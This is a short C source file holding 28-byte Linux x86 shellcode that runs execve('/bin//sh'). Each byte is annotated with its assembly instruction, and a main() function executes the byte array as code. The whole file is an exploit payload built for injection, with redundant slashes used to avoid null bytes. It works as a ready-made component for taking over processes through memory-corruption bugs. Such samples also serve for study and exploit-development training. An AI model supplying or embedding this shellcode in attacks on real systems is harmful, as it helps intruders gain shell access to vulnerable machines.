/*
 *  Shell - just launch a shell.  28 bytes.
 *
 *  Programmed by Tetsuji "Maverick" Rai
 *
 *  maverick31337@elitemail.org
 *
 */


unsigned char shell[] = 

/*  execv ("/bin//sh", {"/bin//sh", NULL}, NULL) */

"\x31\xc0"                   //  xor    %eax,%eax
"\x50"                       //  push   %eax
"\x68\x2f\x2f\x73\x68"       //  push   $0x68732f2f   /* use redundant slashes to avoid NULL byte */
"\x68\x2f\x62\x69\x6e"       //  push   $0x6e69622f
"\x89\xe3"                   //  mov    %esp,%ebx
"\x50"                       //  push   %eax
"\x53"                       //  push   %ebx
"\x89\xe1"                   //  mov    %esp,%ecx
"\x31\xd2"                   //  xor    %edx,%edx
"\xb0\x0b"                   //  mov    $0xb,%al
"\xcd\x80"                   //  int    $0x80

/* exit(anything) return code doesn't matter */

"\xb0\x01"                   //  mov    $0x1,%al
"\xcd\x80"                   //  int    $0x80
;

int
main(){
  void (*shellcode)(void) = (void(*)())shell;

  (*shellcode)();

  return 0;
}